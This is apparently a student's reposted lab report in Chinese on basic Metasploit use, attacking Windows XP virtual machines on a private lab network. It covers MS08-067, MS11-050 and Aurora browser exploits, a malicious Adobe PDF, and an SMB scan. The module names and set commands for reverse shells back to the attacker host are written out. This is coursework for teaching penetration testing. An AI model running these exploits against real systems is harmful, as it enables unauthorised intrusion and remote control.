博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
20155330 《网络对抗》 Exp5 MSF基础应用
阅读量:4842 次
发布时间:2019-06-11

本文共 1679 字,大约阅读时间需要 5 分钟。

20155330 《网络对抗》 Exp5 MSF基础应用

实践过程记录

主动攻击实践:MS08_067漏洞攻击

  • 攻击机:kali
    • IP地址:192.168.124.132
  • 靶机:windows XP SP3 简体中文
    • IP地址:192.168.124.135
  • 输入命令use exploit/windows/smb/ms08_067_netapi
  • 设置参数
set payload generic/shell_reverse_tcptcp反向回连set LHOST 192.168.124.132 set LPORT 5330 端口set RHOST 192.168.124.135set target 0
  • 并进行攻击exploit
    1071510-20180428231608555-731908016.png
  • 结果失败了。
    1071510-20180428232156468-107567729.png
  • 然后重新换了一台靶机windows XP SP3(English),重设了攻击目标地址。
    1071510-20180428232353094-2087817003.png
  • 成功了,使用systeminfo查看靶机信息。

    1071510-20180428232515537-684553484.png

    针对浏览器攻击:MS11-050漏洞攻击

  • 攻击机:kali
    • IP地址:192.168.124.132
  • 靶机:Windows XP Professional SP3 简体中文
    • IP地址:192.168.124.135
  • use windows/browser/ms11_050_mshtml_cobjectelement使用该模块
  • 加载payloadset payload windows/meterpreter/reverese_http,并设置相应参数,打开服务exploit,发起渗透攻击。
    1071510-20180428232748208-1421332962.png
  • 在靶机中启动IE 7浏览器,访问链接:http://192.168.124.132:8080/ms5330
    1071510-20180428232944302-764173067.png
  • 但是在kali攻击机中一直出错,回连没有成功。
  • 然后参考组长的,将攻击的目标漏洞换成了MS10_002_aurora

    针对浏览器攻击:MS10_002_aurora漏洞攻击

  • 攻击机:kali
    • IP地址:192.168.124.129
  • 靶机:Windows XP Professional SP3(English)
    • IP地址:192.168.124.136
  • 输入下图中的命令并执行攻击
    1071510-20180428233540423-1824643812.png
  • 在靶机中启动IE 7浏览器,访问链接:http://192.168.124.132:8080/aurora.html
    1071510-20180428233734362-1632013800.png
  • 本来是回连成功的,但是输入错了命令,然后只好重做了一遍。
    1071510-20180428233651018-641538666.png
  • 第二次生成了不同的网址
    1071510-20180428233902479-1566849672.png
  • 回连成功后使用sysinfo查看靶机信息
    1071510-20180428233928562-2137164248.png
  • 靶机ip地址

    1071510-20180428234017210-514262909.png

    针对客户端的攻击:Adobe渗透测试

  • 攻击机:kali
    • IP地址:192.168.124.129
  • 靶机:Windows XP Professional SP3 简体中文
    • IP地址:192.168.124.135
  • 进入windows/fileformat/adobe_cooltype_sing模块设定相关系数并生成相关文件5330.pdf
    1071510-20180428234328155-158351430.png
  • 将生成的pdf文件导入到靶机中运行,回连成功!可对靶机进行操作。
    1071510-20180428234415062-1668135182.png
  • 在靶机中关闭PDF文档后,攻击机与靶机断开连接。

    1071510-20180428234639621-1558877207.png

    辅助模块

  • 输入命令show auxiliary查看所有辅助模块
    1071510-20180428234737397-200210473.png
  • 选中其中一个模块进入。该模块是用于对smb的版本进行扫描,SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。。
    1071510-20180502133437782-1464465108.png
  • 设置必要参数,并使用show options查看需要设置的消息
    1071510-20180502133508521-1001806715.png
  • 使用命令run开启扫描,结果如下:

    1071510-20180502133519366-430966079.png

实验后回答问题

  • exploit
    • 攻击。简单来说就是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击。主要分为主动攻击和被动攻击。
  • payload
    • 攻击载荷。类似shellcode,在攻击渗透成功后对被感染计算机进行后门操作,达到攻击效果。
  • encode
    • 编码器。修改字符达到“免杀”目的。

实验感受

这次实验主要对Windows xp系统及其有关应用中的部分漏洞进行了攻击,从而也感受到了msf工具功能的强大。

转载于:https://www.cnblogs.com/ashin-kl/p/8970059.html

你可能感兴趣的文章
一条咸鱼的养成
查看>>
修复LSP 解决不能上网问题
查看>>
第四周作业总结
查看>>
修改之前某次commit日志和内容
查看>>
动态规划:HDU1712-ACboy needs your help(分组背包问题)
查看>>
PAT A1009 Product of Polynomials(25)
查看>>
libFFM 与 python-libffm 安装遇到的一系列问题-解决方案
查看>>
数据摘要pandas
查看>>
浅谈C语言中的位段
查看>>
2019.04.25 第七次训练 【2017-2018 ACM-ICPC Asia East Continent League Final (ECL-Final 2017)】...
查看>>
javascript正则表达式复习
查看>>
【JVM】类加载器及双亲委派机制实例解析
查看>>
python 生成 pyc 文件
查看>>
linux清除git账号密码
查看>>
grep awk 查看nginx日志中所有访问的ip并 去重
查看>>
vue 遇到防盗链 img显示不出来
查看>>
C# GDI graphics.DrawImage 的参数问题
查看>>
【WPF】2、美化控件
查看>>
css 光标
查看>>
深入理解await与async
查看>>